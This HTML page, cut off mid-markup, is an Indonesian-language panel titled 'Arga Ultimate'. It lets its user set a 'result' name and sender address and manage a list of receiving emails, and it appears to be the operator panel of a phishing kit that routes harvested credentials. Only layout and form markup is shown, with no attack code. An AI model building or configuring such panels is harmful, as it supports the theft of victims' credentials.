<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Arga Ultimate</title>
    <link rel='stylesheet' href='https://cdn.rawgit.com/JacobLett/bootstrap4-latest/504729ba/bootstrap-4-latest.min.css'>
    <link rel="stylesheet" href="style.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins&display=swap');
        *{ 
            margin:0; 
            padding: 0; 
            box-sizing: border-box; 
            font-family: 'Poppins', sans-serif; 
        }
        html,body{
            height: 100%; 
        }
        body{
            display: grid; 
            place-items: center; 
            text-align: center; 
            background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab); 
            background-size: 400% 400%; 
            animation: gradient 20s ease infinite;
        }
        @keyframes gradient {
            0% { 
                background-position: 0% 50%; 
            }
            50% { 
                background-position: 100% 50%; 
            }
            100% { 
                background-position: 0% 50%; 
            }
        }
    </style>
</head>
<body>
    <div class="container" style="height:100vh;display:flex;align-items: center;justify-content: center;">
        <form class="container" id="needs-validation" onsubmit="return false">
            <div class="add">
                <div class="form-group">
                    <img src="https://i.ibb.co/ryqNVsm/20231119-192117-removebg-preview.png" style="transform:scale(1.2);max-width: 100%">
                </div>
                <div class="jumbotron p-2">
                    <nav class="navbar navbar-light bg-dark text-white p-0 pl-2 rounded">
                        <a class="navbar-brand text-white" href="#"> Data Result </a>
                    </nav>
                    <label class="mt-3" for="exampleInputEmail1">Nama Result</label>
                    <input type="email" class="form-control" value="WEB CAHYO SR ||" readonly>
                    <label class="mt-2" for="exampleInputEmail1">Panel Murni</label>
                    <input type="email" class="form-control" value="admin@ftmnjasteb.com" readonly>
                    <button class="btn btn-primary mt-3" data-toggle="modal" data-target="#gantidata">Ganti Data</button>
                </div>
                <div class="jumbotron p-2">
                    <nav class="navbar navbar-light bg-dark text-white p-0 pl-2 rounded">
                        <a class="navbar-brand text-white" href="#"> Data Email </a>
                    </nav>
                    <label class="mt-3" for="exampleInputEmail1">List Email</label>
                    <div id="email-list"></div>
                    <div class="mt-3">
                        <button class="btn btn-primary" data-toggle="modal" data-target="#exampleModalCenter">Tambah Email</button>
                        <button class="btn btn-danger" data-toggle="modal" data-target="#delete">Hapus Email</button>
                    </div>
                </div>
            </div>
        </form>
    </div>

    <div class="modal fade" id="gantidata" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="exampleModalLongTitle">Ganti Data</h5>
                </div>
                <div class="modal-body">
                    <div class="form-group">
                        <label for="exampleInputEmail1">Nama Ress Boleh Di Ubah</label>
                        <input type="text" id="valNick" class="form-control" value="WEB CAHYO SR ||">
                        <label class="mt-2" for="exampleInputEmail1">↓DiLarang Di Ubah↓</label>
                        <input type="email" id="valSender" class="form-control" value="admin@ftmnjasteb.com">
                    </div>
                </div>
                <div class="modal-footer d-flex justify-content-start">
                    <button type="button" id="gantis